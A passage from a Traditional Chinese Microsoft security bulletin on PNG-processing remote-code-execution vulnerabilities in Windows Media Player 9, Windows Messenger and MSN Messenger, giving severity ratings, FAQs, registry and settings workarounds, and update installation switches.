產品技術支援週期準則網站](https://support.microsoft.com/gp/lifecycle/zh-tw),以瞭解您的產品及版本的支援生命週期。 ### 一般資訊 提要 ---- **提要:** 這個更新程式能解決一項新發現的公開弱點。 PNG 影像格式的處理程序中存在遠端執行程式碼的弱點。 本公告的<弱點詳細資訊>部分會提供這項弱點的相關資訊。 成功利用此弱點的攻擊者可以取得受影響系統的完整控制權。 攻擊者接下來將能安裝程式,檢視、變更或刪除資料,或建立具有完整使用者權限的新帳戶。 **嚴重性等級和弱點識別碼:** <p> </p> <table style="border:1px solid black;"> <thead> <tr class="header"> <th style="border:1px solid black;" >弱點識別碼</th> <th style="border:1px solid black;" >弱點的影響</th> <th style="border:1px solid black;" >Windows Media Player 9 系列 CAN-2004-1244</th> <th style="border:1px solid black;" >Windows Messenger (所有版本) CAN-2004-0597</th> <th style="border:1px solid black;" >MSN Messenger 6.1 及 6.2 CAN-2004-0597</th> </tr> </thead> <tbody> <tr class="odd"> <td style="border:1px solid black;">PNG 處理弱點 - <a href="https://www.cve.mitre.org/cgi-bin/cvename.cgi?name=can-2004-1244">CAN-2004-1244</a></td> <td style="border:1px solid black;">遠端執行程式碼</td> <td style="border:1px solid black;">重大<br /> </td> <td style="border:1px solid black;">無</td> <td style="border:1px solid black;">無</td> </tr> <tr class="even"> <td style="border:1px solid black;">PNG 處理弱點 - <a href="https://www.cve.mitre.org/cgi-bin/cvename.cgi?name=can-2004-0597">CAN-2004-0597</a></td> <td style="border:1px solid black;">遠端執行程式碼<br /> </td> <td style="border:1px solid black;">無</td> <td style="border:1px solid black;">中度</td> <td style="border:1px solid black;">重大<br /> </td> </tr> <tr class="odd"> <td style="border:1px solid black;"><strong>所有弱點的彙總嚴重性</strong></td> <td style="border:1px solid black;"></td> <td style="border:1px solid black;"><strong>重大</strong></td> <td style="border:1px solid black;"><strong>中度</strong><br /> </td> <td style="border:1px solid black;"><strong>重大</strong><br /> </td> </tr> </tbody> </table> 此項[評估](https://technet.microsoft.com/security/bulletin/rating)的根據包括:受弱點影響的系統類型、系統的一般部署模式,以及弱點遭利用後對系統所造成的影響。 與本安全性更新相關的常見問題集 (FAQ) ------------------------------------ **這次發行的更新程式取代了哪些更新?** 本安全性更新僅取代了一個先前發行的 Windows Media Player 安全性公告。 下表列出受影響的安全性公告編號及相關的版本。 | 公告編號 | Windows Media Player 9 系列 | |--------------|-----------------------------| | **MS03-021** | 取代 | **Windows 98、Windows 98 Second Edition 和 Windows Millennium Edition 的延伸支援服務,對於針對這些作業系統發行的安全性更新有什麼影響?** Microsoft 只針對重大安全性問題發行安全性更新。 在這段支援服務期間,不會對非重大安全性的問題提供安全性更新。 如想瞭解這些作業系統的 Microsoft 技術支援週期準則,請造訪這個[網站](https://go.microsoft.com/fwlink/?linkid=33327)。 如需更多有關嚴重性等級的資訊,請造訪這個[網站](https://technet.microsoft.com/security/bulletin/rating) **注意:**本安全性公告中有這些平台的重大安全性更新,並可從 [Windows Update 網站](https://go.microsoft.com/fwlink/?linkid=21130)下載。 **本安全性公告所提到的弱點,是否會對 Windows 98、Windows 98 Second Edition 或 Windows Millennium Edition 帶來重大的影響?** 是。 這項弱點會對 Windows 98、Windows 98 Second Edition 或 Windows Millennium Edition 帶來重大的影響。 本安全性公告中有這些平台的重大安全性更新,並可從 [Windows Update 網站](https://go.microsoft.com/fwlink/?linkid=21130)下載。 如需更多有關嚴重性等級的資訊,請造訪這個[網站](https://technet.microsoft.com/security/bulletin/rating) **如何可取得 MSN Messenger 更新程式?** MSN Messenger 更新程式可透過本公告<受影響的軟體>部份中的下載連結取得。 此外,本更新程式發行後不久,登入 MSN Messenger 的客戶將可收到更新版本的 MSN Messenger。 **為何 Windows Messenger 5.0 更新程式升級至 5.1 版,而非 5.0 更新程式?** 由於 Windows Messenger 5.0 的基礎結構因素,無法提供遞增補充程式。 Windows Messenger 5.0 的修正程式一律需要部署完全更新的 Windows Messenger 套件,因此推出 Windows Messenger 5.1 套件。 根據客戶回報結果,已決定遞增版本號碼,便於識別所部署的版本。 **此一新版 Windows Messenger 包含哪些功能的變更?** 除本公告相關安全性修正程式之外,Windows Messenger 5.1 並包含對於 Windows Messenger 5.0 的其他錯誤修正程式。 完整詳細資訊請參閱 Windows Messenger 5.1 下載網頁。 **是否可以使用 Microsoft Baseline Security Analyzer (MBSA) 來判斷是否需要此更新?** MBSA 會判斷 Windows Media Player 是否需要此更新。 MBSA 不會判斷 Windows Messenger 或 MSN Messenger 是否需要此更新, 而會針對此事項提供注意訊息。 如需關於 MBSA 中注意訊息的詳細資訊,請參閱 [Microsoft 知識庫文件編號 306460](https://support.microsoft.com/kb/306460)。 Microsoft 已發佈「企業更新掃描工具 (EST)」,協助客戶偵測 MBSA 目前尚未支援的必要安全性更新程式。 如需有關 MBSA 目前無法偵測的程式詳細資訊,請參閱 [Microsoft 知識庫文件編號 306460](https://support.microsoft.com/kb/306460) **什麼是企業更新掃描工具 (EST)?** 對於「重要」及「重大」公告等級弱點的綜合更新,我們會持續提供偵測工具,因此可能會在某些公告提供獨立的工具。 Microsoft 會評估各公告於偵測與部署的複雜性,根據每次發行的細節提供偵測上的支援。 當特定公告提供偵測工具時,客戶可以使用命令列介面執行工具。 接著客戶可以使用 XML 輸出檔案處理結果。 Microsoft 將會隨工具提供詳細的說明文件,以確保客戶能順利使用。 **是否可以使用企業更新掃描工具 (EST) 的版本來判斷是否需要此更新程式?** 是。 Microsoft 已建立新版 EST,可判斷您是否需要套用此更新。 此工具可以從 [Microsoft 下載中新](https://go.microsoft.com/fwlink/?linkid=41947)取得。 此工具另有 SMS 客戶可從 [SMS 網站](https://www.microsoft.com/taiwan/smserver/default.htm)取得的版本。 **是否可以使用 Systems Management Server (SMS) 來判斷是否需要此更新?** 是。 SMS 能協助偵測及部署本安全性更新。 SMS 使用 MBSA 來進行偵測,因此 SMS 也會面臨與 MBSA 相同的限制,而無法偵測部份程式;請參閱本公告先前所述說明。 如需關於 SMS 的詳細資訊,請造訪 [SMS 網站](https://www.microsoft.com/taiwan/smserver/default.htm)。 要偵測 Microsoft Windows 及其他受影響的 Microsoft 產品,需要使用安全性更新盤點工具 (Security Update Inventory Tool)。 如需更多有關安全性更新盤點工具限制的資訊,請參閱 [Microsoft 知識庫文件編號 306460](https://support.microsoft.com/kb/306460)。 弱點詳細資料 ------------ #### Windows Media Player 的 PNG 處理弱點 - CAN-2004-1244: Windows Media Player 處理寬度或高度值過高的 PNG 檔案的方式有誤,因此存在遠端執行程式碼的弱點。 攻擊者可能會製作惡意的 PNG,在使用者造訪惡意網站或按一下惡意電子郵件中的連結後,允許從遠端執行程式碼,以利用這個弱點。 成功利用此弱點的攻擊者可以取得受影響系統的完整控制權。 #### Windows Media Player 的 PNG 處理弱點 - CAN-2004-1244 的緩和因素: - 在網頁式攻擊的案例中,攻擊者必須架設網站,並在其中包含透過惡意 PNG 檔案利用此弱點的網頁。 攻擊者也可危及網站,使該網站顯示含有惡意內容的網頁。 攻擊者並不能強制使用者造訪網站, 而是引誘他們自行前往。一般的做法是設法讓使用者按一下通往攻擊者網站或攻擊者所危及網站的連結。 - 成功利用此弱點的攻擊者可以取得與本機使用者相同的使用者權限。 系統上帳戶使用者權限較低的使用者,其受影響的程度比擁有系統管理權限的使用者要小。 #### Windows Media Player 的 PNG 處理弱點 - CAN-2004-1244 的因應措施: Microsoft 已經測試過以下的因應措施。 這些因應措施並不能徹底解決弱點,但是有助於封鎖已知的攻擊行為。 如果因應措施會降低功能,以下將會描述功能降低的情況。 針對此項弱點,Microsoft 已發現數種不同的攻擊模式。 每種攻擊模式有不同的因應措施。 - **靜態 WMP 副檔名攻擊的因應措施** **解除 WMP 副檔名關聯。** 在 Windows 中解除下列副檔名的關聯,以避免預覽或開啟指向格式不正確 PNG 檔的檔案:.ASX、.WAX、.WVX、.WPL、.WMX、.WMS、.WMZ。 手動步驟 - Windows Media Player 法: - 啟動 Windows 檔案總管 - 在 \[工具\] 功能表中,選擇 \[資料夾選項\] - 選擇 \[檔案類型\] 索引標籤 - 上下捲動到 .ASX 副檔名,然後按 \[刪除\] 按鈕 - 為前面列出的每一種副檔名重複第 4 步。 此外,企業客戶也可使用 [Microsoft 知識庫文件編號 837388](https://support.microsoft.com/?id=837388) 中記載的步驟,設定 Outlook 以封鎖列出的危險檔案。 請依照其中的指示,新增記載的副檔名到階層 1 封鎖清單中。 家庭使用者可進行 [Microsoft 知識庫文件編號 291387](https://support.microsoft.com/?id=291387) 中記載的步驟,設定 Outlook Express 以封鎖列出的危險檔案。 可使用此資訊在 Windows \[檔案類型\] 對話方塊中,將每個副檔名設定為 \[下載之後進行開啟確認\]。 **因應措施的影響:**刪除與 Media Player 的檔案關聯很可能導致使用 Windows Media Server/Player 播放網路廣播與訓練課程等的企業使用者無法正常作業。 想要觀賞各網站串流內容的家庭使用者執行此因應措施後也可能受影響。 - **WMP ActiveX 攻擊的 Internet Explorer 因應措施** **停用 Windows Media Player ActiveX 控制項**。 為防止遭受網頁內的攻擊,請依照下列步驟停用 Windows Media Player ActiveX 控制項: 請依照 [Microsoft 知識庫文件編號 240797](https://support.microsoft.com/default.aspx?scid=kb;en-us;q240797) 中的指示,刪除 Internet Explorer 中的下列 CLSID 位元: ``` CLSID:{6BF52A52-394A-11D3-B153-00C04F79FAA6}PROGID:WMPlayer.OCX.7 CLSID:{22D6F312-B0F6-11D0-94AB-0080C74C7E95}PROGID:MediaPlayer.MediaPlayer.1 CLSID:{05589FA1-C356-11CE-BF01-00AA0055595A}PROGID:AMOVIE.ActiveMovieControl.2 ``` **因應措施的影響:** 如果您停用 Windows Media Player ActiveX 控制項,使用此控制項的網頁便不再依設計方式作用。 如此會使內容無法透過此控制項播放,包括音訊和視訊在內。 - **Content-Type HTTP 標題攻擊** 由於 MIME 類型項目都有可能被濫用來利用此弱點,因此預防這個攻擊的唯一方法就是在登錄中移除所有可能的 MIME 類型項目;這類登錄項目會為 Windows Media Player 與列在伺服器傳回的 Content-Type 標頭中的 MIME 類型建立關聯。 下面是與 WMP CLSID 相關聯的 MIME 類型清單。 ``` HKEY_CLASSES_ROOT\MIME\Database\Content Type\application/vnd.ms-wpl HKEY_CLASSES_ROOT\MIME\Database\Content Type\application/x-mplayer2 HKEY_CLASSES_ROOT\MIME\Database\Content Type\application/x-ms-wmd HKEY_CLASSES_ROOT\MIME\Database\Content Type\application/x-ms-wmz HKEY_CLASSES_ROOT\MIME\Database\Content Type\audio/aiff HKEY_CLASSES_ROOT\MIME\Database\Content Type\audio/basic HKEY_CLASSES_ROOT\MIME\Database\Content Type\audio/mid HKEY_CLASSES_ROOT\MIME\Database\Content Type\audio/midi HKEY_CLASSES_ROOT\MIME\Database\Content Type\audio/mp3 HKEY_CLASSES_ROOT\MIME\Database\Content Type\audio/mpeg HKEY_CLASSES_ROOT\MIME\Database\Content Type\audio/mpegurl HKEY_CLASSES_ROOT\MIME\Database\Content Type\audio/mpg HKEY_CLASSES_ROOT\MIME\Database\Content Type\audio/wav HKEY_CLASSES_ROOT\MIME\Database\Content Type\audio/x-aiff HKEY_CLASSES_ROOT\MIME\Database\Content Type\audio/x-mid HKEY_CLASSES_ROOT\MIME\Database\Content Type\audio/x-midi HKEY_CLASSES_ROOT\MIME\Database\Content Type\audio/x-mp3 HKEY_CLASSES_ROOT\MIME\Database\Content Type\audio/x-mpeg HKEY_CLASSES_ROOT\MIME\Database\Content Type\audio/x-mpegurl HKEY_CLASSES_ROOT\MIME\Database\Content Type\audio/x-mpg HKEY_CLASSES_ROOT\MIME\Database\Content Type\audio/x-ms-wax HKEY_CLASSES_ROOT\MIME\Database\Content Type\audio/x-ms-wma HKEY_CLASSES_ROOT\MIME\Database\Content Type\audio/x-wav HKEY_CLASSES_ROOT\MIME\Database\Content Type\midi/mid HKEY_CLASSES_ROOT\MIME\Database\Content Type\video/avi HKEY_CLASSES_ROOT\MIME\Database\Content Type\video/mpeg HKEY_CLASSES_ROOT\MIME\Database\Content Type\video/mpg HKEY_CLASSES_ROOT\MIME\Database\Content Type\video/msvideo HKEY_CLASSES_ROOT\MIME\Database\Content Type\video/x-ivf HKEY_CLASSES_ROOT\MIME\Database\Content Type\video/x-mpeg HKEY_CLASSES_ROOT\MIME\Database\Content Type\video/x-mpeg2a HKEY_CLASSES_ROOT\MIME\Database\Content Type\video/x-ms-asf HKEY_CLASSES_ROOT\MIME\Database\Content Type\video/x-ms-asf-plugin HKEY_CLASSES_ROOT\MIME\Database\Content Type\video/x-msvideo HKEY_CLASSES_ROOT\MIME\Database\Content Type\video/x-ms-wm HKEY_CLASSES_ROOT\MIME\Database\Content Type\video/x-ms-wmp HKEY_CLASSES_ROOT\MIME\Database\Content Type\video/x-ms-wmv HKEY_CLASSES_ROOT\MIME\Database\Content Type\video/x-ms-wmx HKEY_CLASSES_ROOT\MIME\Database\Content Type\video/x-ms-wvx ``` **因應措施的影響:** - 這些 MIME 類型登錄機碼都含有一個 CLSID 值,指向下列 CLISD: HKEY\_CLASSES\_ROOT\\CLSID\\{CD3AFA8F-B84F-48F0-9393-7EDC34128127}\\InprocServer32 這個 CLISD 與 WMP.DLL 相關聯,WMP.DLL 負責在使用這些 MIME 類型時啟動 Windows Media Player。 取消 WMP.DLL 登錄會導致 Windows Media Player 作業中斷。 - 這項因應措施列出的 MIME 類型僅適用 Windows XP。 其他平台可能尚有其他可用的 MIME 類型。 如需更多關於 Windows Media Player 副檔名的資訊,請參閱這個 [MSDN 網站](https://msdn.microsoft.com/library/default.asp?url=/library/en-us/wmplay10/mmp_sdk/filenameextensions.asp) (英文)。 #### Windows Media Player 的 PNG 處理弱點 - CAN-2004-1244 的常見問題集: **這個弱點的範圍為何?** 這是遠端執行程式碼的弱點。 成功利用此弱點的攻擊者可以取得受影響系統的完整控制權。 **造成這個弱點的原因為何?** Windows Media Player 無法充分驗證寬度或高度值過高的 PNG 影像格式。 **什麼是 PNG?** PNG 是 Portable Network Graphics (可攜式網路圖形) 的縮寫。 可攜式網路圖形 (PNG) 格式是為了取代舊有較簡單的 GIF 格式所設計,也有部分是為了取代更為複雜的 TIFF 格式。 如需更多關於 PNG 的資訊,請參閱這個[網站](https://www.libpng.org/pub/png/pngintro.html) (英文)。 **攻擊者可能會利用這項弱點採取什麼行動?** 成功利用此弱點的攻擊者可以取得受影響系統的完整控制權。 **什麼人可以利用此弱點?** 任何匿名使用者只要能在網站、網路共用區中提供格式錯誤的 PNG 檔案,或說服使用者開啟以電子郵件附件傳送的 PNG 檔案,便可能利用這項弱點。 **攻擊者如何利用這項弱點?** 攻擊者可以在網站或網路共用區中提供蓄意製作的 PNG 檔案,再引誘使用者造訪網站,進而利用這項弱點。 此外,攻擊者可在電子郵件中傳送惡意 PNG 檔案的連結,並且引誘使用者按一下連結。 **因為這個弱點而承受風險的主要系統有哪些?** 工作站和終端機伺服器的風險最高。 如果系統管理憑證不足的使用者被授予登入伺服器並執行程式的能力時,伺服器會面臨更大的風險。 然而,最佳實務強烈建議您制止這種行為。 **這項弱點是否會對 Windows 98、Windows 98 Second Edition 或 Windows Millennium Edition 帶來重大的影響?** 這項弱點不會對 Windows 98 帶來重大的影響,然而 Windows 98 Second Edition 及 Windows Millennium Edition 則會受到影響。 本安全性公告中有這些平台的重大安全性更新,並可從 [Windows Update 網站](https://go.microsoft.com/fwlink/?linkid=21130)下載。 如需更多有關嚴重性等級的資訊,請造訪這個[網站](https://technet.microsoft.com/security/bulletin/rating) **更新的作用何在?** 更新程式會修改 Windows Media Player 驗證 PNG 檔案寬度和高度的方式,進而解除此項弱點。 **當安全性公告發行時,這項弱點是否已揭發出來?** 與此類似的弱點已揭發出來,並被歸類為「一般性弱點」,揭示編號為 [CAN-2004-0597](https://cve.mitre.org/cgi-bin/cvename.cgi?name=can-2004-0597)。 **這項弱點是否與**[CAN-2004-0597](https://cve.mitre.org/cgi-bin/cvename.cgi?name=can-2004-0597) **所描述的弱點相同?** 雖然與這裡描述的弱點相似,但是 Windows Media Player 並沒有使用或加入受影響的 libpng 程式庫。 不過,Windows Media Player 因設定方式之故,還是會受到這裡描述的弱點影響。 **當本安全性公告發行時,Microsoft 是否已接獲任何消息,指出這項弱點已遭有心人士惡用?** 否。 當本安全性公告初次發行時,Microsoft 並未接到任何有關本弱點已成為公開攻擊媒介的消息,也沒有發現任何以此概念發展的程式碼公開範例。 #### Windows Messenger 的 PNG 處理弱點 - CAN-2004-0597: 由於 Windows Messenger 處理損毀或格式不正確的 PNG 方式有問題,導致其中存在遠端執行程式碼的弱點。 成功利用此弱點的攻擊者可以取得受影響系統的完整控制權。 #### Windows Messenger 的 PNG 處理弱點 - CAN-2004-0597 的緩和因素: - Windows Messenger 中弱點的性質與 MSN Messenger 或 Windows Media Player 中的不同。 若要利用 Windows Messenger 中的弱點,方法可能非常複雜,需要對組織內部網路投入大量心力、並且具備深厚知識,方能嘗試利用這項弱點。 - 使用者必須正在執行 Windows Messenger,並設定要接收 .NET Alerts。 #### Windows Messenger 的 PNG 處理弱點 - CAN-2004-0597 的因應措施: Microsoft 已經測試過以下的因應措施。 這些因應措施並不能徹底解決弱點,但是有助於封鎖已知的攻擊行為。 如果因應措施會降低功能,以下將會描述功能降低的情況。 **關閉 Windows Messenger 的 .NET Alerts 功能。** - 開啟 Windows Messenger - 移至 \[工具\] 功能表,選擇 \[選項\] - 在 \[選項\] 對話方塊中,移至 \[隱私\] 索引標籤。 - 核取說明 \[不要下載任何索引標籤到我的電腦\] 的選項 **注意:**這項設定會在您下回登入 Windows Messenger 起生效。 只有註冊願意接收的 Passport 帳戶才能使用 .Net Alerts。 未曾設定帳戶以接收這些通知的使用者無法使用這項設定。 #### Windows Messenger 的 PNG 處理弱點 - CAN-2004-0597 的常見問題集: **這個弱點的範圍為何?** 這是遠端執行程式碼的弱點。 成功利用此弱點的攻擊者可以取得受影響系統的完整控制權。 **造成這個弱點的原因為何?** Windows Messenger 使用公開的 libpng 1.2.5 版程式庫,這個程式庫近期被發現有數項已知弱點。 **什麼是 PNG?** PNG 是 Portable Network Graphics (可攜式網路圖形) 的縮寫。 可攜式網路圖形 (PNG) 格式是為了取代舊有較簡單的 GIF 格式所設計,也有部分是為了取代更為複雜的 TIFF 格式。 如需更多關於 PNG 的資訊,請參閱這個[網站](https://www.libpng.org/pub/png/pngintro.html) (英文)。 **攻擊者可能會利用這項弱點採取什麼行動?** 成功利用此弱點的攻擊者可以取得受影響系統的完整控制權。 **什麼人可以利用此弱點?** 若要利用 Windows Messenger 中的弱點,方法可能非常複雜,需要對組織內部網路投入大量心力、並且具備深厚知識,方能嘗試利用這項弱點。 攻擊者除非能夠偽造 .NET Messenger 服務,否則就必須攔截並重寫用戶端與伺服器間的通訊。 僅是將格式不正確的 PNG 影像檔傳送至 Windows Messenger 並不能利用此弱點。 **因為這個弱點而承受風險的主要系統有哪些?** 工作站和終端機伺服器的風險最高。 如果系統管理憑證不足的使用者被授予登入伺服器並執行程式的能力時,伺服器會面臨更大的風險。 然而,最佳實務強烈建議您制止這種行為。 **這項弱點是否會對 Windows 98、Windows 98 Second Edition 或 Windows Millennium Edition 帶來重大的影響?** 否。 這些弱點都不會對 Windows 98、Windows 98 Second Edition,或 Windows Millennium Edition 造成任何重大的影響。 如需更多有關嚴重性等級的資訊,請造訪這個[網站](https://technet.microsoft.com/security/bulletin/rating) **是否可以透過網際網路利用這個弱點?** 否。 攻擊者除非能夠偽造 .NET Messenger 服務,否則就必須攔截並重寫用戶端與伺服器間的通訊。 僅是將格式不正確的 PNG 傳送至 Windows Messenger 並不能利用此弱點。 Microsoft 已經針對這個問題提出如何保護電腦的因應措施。 一般使用者可以造訪[保護您的電腦網站](https://go.microsoft.com/fwlink/?linkid=21169)。 IT 專業人員可以造訪[資訊安全指導中心網站](https://go.microsoft.com/fwlink/?linkid=21171)。 **更新的作用何在?** 本更新解決這項弱點的方式是將 Windows Messenger 所使用的程式庫更新,使其能充分驗證所處理的 PNG 影像檔案。 此外也可使得 Windows Messenger 能夠驗證 PNG 影像檔案格式是否正確。 **當安全性公告發行時,這項弱點是否已揭發出來?** 這些弱點已揭發出來,並被歸類為「一般性弱點」,揭示編號為 [CAN-2004-0597](https://cve.mitre.org/cgi-bin/cvename.cgi?name=can-2004-0597)、[CAN-2004-0598](https://cve.mitre.org/cgi-bin/cvename.cgi?name=can-2004-0598) 和 [CAN-2004-0599](https://cve.mitre.org/cgi-bin/cvename.cgi?name=can-2004-0599)。 **當本安全性公告發行時,Microsoft 是否已接獲任何消息,指出這項弱點已遭有心人士惡用?** 否。 當本安全性公告初次發行時,Microsoft 並未接到任何有關本弱點已成為公開攻擊媒介的消息,也沒有發現任何以此概念發展的程式碼公開範例。 #### MSN Messenger 的 PNG 處理弱點 - CAN-2004-0597: 由於 MSN Messenger 處理損毀或格式不正確的 PNG 影像檔案的方式有問題,導致其中存在遠端執行程式碼的弱點。 成功利用此弱點的攻擊者可以取得受影響系統的完整控制權。 #### MSN Messenger 的 PNG 處理弱點 - CAN-2004-0597 的緩和因素: - MSN Messenger 依照預設不允許匿名人士傳送訊息給您。 攻擊者必須先引誘您將他們加入您的連絡人清單。 #### MSN Messenger 的 PNG 處理弱點 - CAN-2004-0597 的因應措施: Microsoft 已經測試過以下的因應措施。 這些因應措施並不能徹底解決弱點,但是有助於封鎖已知的攻擊行為。 如果因應措施會降低功能,以下將會描述功能降低的情況。 - 不要將不認得或不信任的地址新增到您的連絡人清單。 - 重新檢查現有連絡人清單,移除不認識、不信任或不再需要的連絡人。 - 依照下列步驟,在 MSN Messenger 中停用顯示圖片: 按一下 \[工具\]。 按一下 \[選項\]。 按一下 \[個人\] 索引標籤 清除 \[在立即訊息對話中顯示其他人的圖片\] 核取方塊。 - 依照下列步驟停用表情符號: 按一下 \[工具\]。 按一下 \[選項\]。 按一下 \[訊息\] 索引標籤。 清除 \[在立即訊息中顯示表情符號\] 核取方塊 清除 \[在立即訊息中顯示自訂的表情符號\] 核取方塊 - 不要同意接收不認識或不信任的連絡人發起的檔案傳輸。 #### MSN Messenger 的 PNG 處理弱點 - CAN-2004-0597 的常見問題集: **這個弱點的範圍為何?** 這是遠端執行程式碼的弱點。 成功利用此弱點的攻擊者可以取得受影響系統的完整控制權。 **造成這個弱點的原因為何?** MSN Messenger 使用公開的 libpng 1.2.5 版程式庫,這個程式庫近期被發現有數項已知弱點。 **什麼是 PNG?** PNG 是 Portable Network Graphics (可攜式網路圖形) 的縮寫。 可攜式網路圖形 (PNG) 格式是為了取代舊有較簡單的 GIF 格式所設計,也有部分是為了取代更為複雜的 TIFF 格式。 如需更多關於 PNG 的資訊,請參閱這個[網站](https://www.libpng.org/pub/png/pngintro.html) (英文)。 **攻擊者可能會利用這項弱點採取什麼行動?** 成功利用此弱點的攻擊者可以取得受影響系統的完整控制權。 **什麼人可以利用此弱點?** 攻擊者可說服使用者將其新增至連絡人清單,並傳送蓄意製作的表情符號或顯示圖片,以利用這項弱點。 **因為這個弱點而承受風險的主要系統有哪些?** 工作站和終端機伺服器的風險最高。 如果系統管理憑證不足的使用者被授予登入伺服器並執行程式的能力時,伺服器會面臨更大的風險。 然而,最佳實務強烈建議您制止這種行為。 **這項弱點是否會對 Windows 98、Windows 98 Second Edition 或 Windows Millennium Edition 帶來重大的影響?** 是。 使用受影響 MSN Messenger 版本的客戶可安裝新版的 MSN Messenger 更新程式。 **更新的作用何在?** 更新程式會更新 MSN Messenger 使用的程式庫,改用會正確驗證所收到 PNG 檔案的程式庫,進而移除這項弱點。 **當安全性公告發行時,這項弱點是否已揭發出來?** 這些弱點已揭發出來,並被歸類為「一般性弱點」,揭示編號為 [CAN-2004-0597](https://cve.mitre.org/cgi-bin/cvename.cgi?name=can-2004-0597)。 **當本安全性公告發行時,Microsoft 是否已接獲任何消息,指出這項弱點已遭有心人士惡用?** 否。 當本安全性公告初次發行時,Microsoft 並未接到任何有關本弱點已成為公開攻擊媒介的消息,也沒有發現任何以此概念發展的程式碼公開範例。 安全性更新資訊 -------------- **安裝平台及必要條件:** 如需有關您使用平台的特定安全性更新資訊,請按一下適當的連結: #### Windows 2000、Windows XP 及 Windows Server 2003 中的 Microsoft Windows Media Player 9 系列 **必要條件** 此安全性更新程式需要 Windows 2000 Service Pack 3 (SP3) 或 Service Pack 4 (SP4)、Windows XP Service Pack 1 (SP1)、Windows Server 2003 安裝 Windows Media Player 9。 以上所列的軟體版本已經過測試判斷其是否會受到影響。 其他版本已不再提供安全性更新支援,或是並不會受到影響。 請造訪 [Microsoft 產品技術支援週期準則網站](https://go.microsoft.com/fwlink/?linkid=21742),以瞭解您的產品及版本的支援生命週期。 如需更多關於如何取得最新 Service Pack 的資訊,請參閱 [Microsoft 知識庫文件編號 260910](https://support.microsoft.com/kb/260910)。 **未來將包含於 Service Pack 中的內容:** 此問題的更新程式會包含在未來的 Service Pack 或更新彙總套件中。 **安裝資訊** 這個安全性更新支援以下的安裝參數: **/help**             顯示命令列選項 **安裝模式** **/quiet**             無訊息模式 (無使用者互動,不顯示任何訊息) **/passive**            自動安裝模式 (僅顯示進度列) **/uninstall**          解除安裝套件 **重新啟動選項** **/norestart**          安裝完成時不要重新開機 **/forcerestart**      安裝之後重新開機 **特殊選項** **/l**                        列出安裝的 Windows Hotfix 或更新的套件 **/o**                       不先提示,直接覆寫 OEM 檔案 **/n**                       不備份解除安裝所需的檔案 **/f**                        當電腦關機時,強制其他程式結束 **/integrate:path**  將更新整合至位於指定路徑的 Windows 來源檔中 **/extract**             不啟動安裝程式,直接解壓縮檔案 **注意:**您可以在同一個命令中合併使用這些參數。 為符合回溯相容性,安全性更新程式也支援舊版安裝公用程式使用的安裝參數。 有關支援的安裝參數的其他資訊,請參閱 [Microsoft 知識庫文件編號 262841](https://support.microsoft.com/kb/262841)。 如需更多關於 Update.exe 安裝程式的相關資訊,請造訪 [Microsoft TechNet 網站](https://go.microsoft.com/fwlink/?linkid=38951) (英文)。 **部署資訊** 在 Windows 2000 的 Windows Media Player 9 系列上,如想在不需要使用者介入的狀況下安裝安全性更新,請在命令提示字元使用下列命令: **WindowsMediaPlayer9-KB885492-x86-enu /passive /quiet** 在 Windows XP 及 Windows Server 2003 的 Windows Media Player 9 系列上,如想在不強制電腦重新開機的狀況下安裝安全性更新,請在命令提示字元下輸入以下的命令: **WindowsMediaPlayer9-KB885492-x86-enu /norestart** 如想瞭解如何透過 Software Update Services 部署這個安全性更新,請造訪 [Software Update Services 網站](https://www.microsoft.com/taiwan/windowsserversystem/sus/susoverview.mspx)。 **重新開機需求** 在某些情況下,此更新程式不需要重新開機。 安裝程式會停止所需服務,然後套用更新,再重新啟動服務。 不過,如果必要的服務無法停止,或是必要的檔案正在使用中,更新程式就會要求重新開機。 在此情況下,系統會出現訊息提示您重新開機。 **移除資訊** 如果要移除此更新程式,請使用 \[控制台\] 中的 \[新增或移除程式\] 工具。 系統管理員也可以使用 Spuninst.exe 公用程式來移除此安全性更新。 Spuninst.exe 公用程式位於 %Windir%\\$NTUninstallKB885492$\\Spuninst 資料夾中。 Spuninst.exe 公用程式支援以下的安裝參數: **/help**             顯示命令列選項 **安裝模式** **/quiet**             無訊息模式 (無使用者互動,不顯示任何訊息) **/passive**            自動安裝模式 (僅顯示進度列) **重新啟動選項** **/norestart**          安裝完成時不要重新開機 **/forcerestart**      安裝之後重新開機 **特殊選項** **/f**                        當電腦關機時,強制其他程式結束 **檔案資訊** 本更新程式的英文版本具有下表列出 (或更新) 的檔案屬性。 這些檔案的日期及時間均使用 Coordinated Universal Time (UTC)。 當您檢視檔案資訊時,它會轉換為當地時間。 如想知道 UTC 及當地時間的時差,請使用 \[控制台\] 中的 \[日期和時間\] 工具的 **\[時區\]** 索引標籤。 Windows 2000、Windows XP 及 Windows Server 2003 的 Microsoft Windows Media Player 9 系列: | 檔案名稱 | 版本 | 日期 | 時間 | 大小 | |----------|------------|-------------|-------|-----------| | Wmp.dll | 9.0.0.3250 | 04-Aug-2004 | 07:56 | 4,874,240 | **注意:**當您在 Windows Server 2003 電腦上安裝本安全性更新時,安裝程式會檢查系統上要更新的檔案先前是否曾經用 Microsoft Hotfix 更新。 如果您先前曾經安裝 Hotfix 更新其中一個受影響的檔案,安裝程式會將 RTMQFE 檔案複製到您的系統中。 否則,安裝程式會將 RTMGDR 檔案複製到您的系統中。 如需更多有關這種行為的資訊,請參閱 [Microsoft 知識庫文件編號 824994](https://support.microsoft.com/kb/824994)。 如需更多關於 Update.exe 安裝程式的相關資訊,請造訪 [Microsoft TechNet 網站](https://go.microsoft.com/fwlink/?linkid=38951) (英文)。 如需更多關於出現於本公告中術語的相關資訊 (如 *Hotfix*),請參閱 [Microsoft 知識庫文件編號 824684](https://support.microsoft.com/kb/824684)。 **確認更新的安裝** - **Microsoft Baseline Security Analyzer** 如果要確認安全性更新已經安裝到受影響的系統,您可以使用 Microsoft Baseline Security Analyzer (MBSA) 工具。 這項工具讓系統管理員能夠掃描本機和遠端系統,找出遺漏的安全性更新,以及常見的錯誤安全性設定。 如需關於 MBSA 的詳細資訊,請造訪 [Microsoft Baseline Security Analyzer 網站](https://go.microsoft.com/fwlink/?linkid=21134) (英文)。 - **檔案版本驗證** **注意:**由於 Microsoft Windows 的版本眾多,您電腦上實際執行的步驟可能會與此處描述的不同。 如遇到不同的狀況,請參閱產品的說明文件以完成這些步驟。 1. 按一下 \[開始\],然後按一下 \[搜尋\]。 2. 在 \[搜尋結果\] 窗格中,在 \[搜尋小幫手\] 下按一下 \[所有檔案和資料夾\]。 3. 在 \[部份或完整的檔案名稱\] 方塊中,輸入適當檔案資訊表中的檔案名稱,再按一下 \[搜尋\]。 4. 在檔案清單中,用滑鼠右鍵按一下適當檔案資訊表格中某個檔案名稱,然後按一下 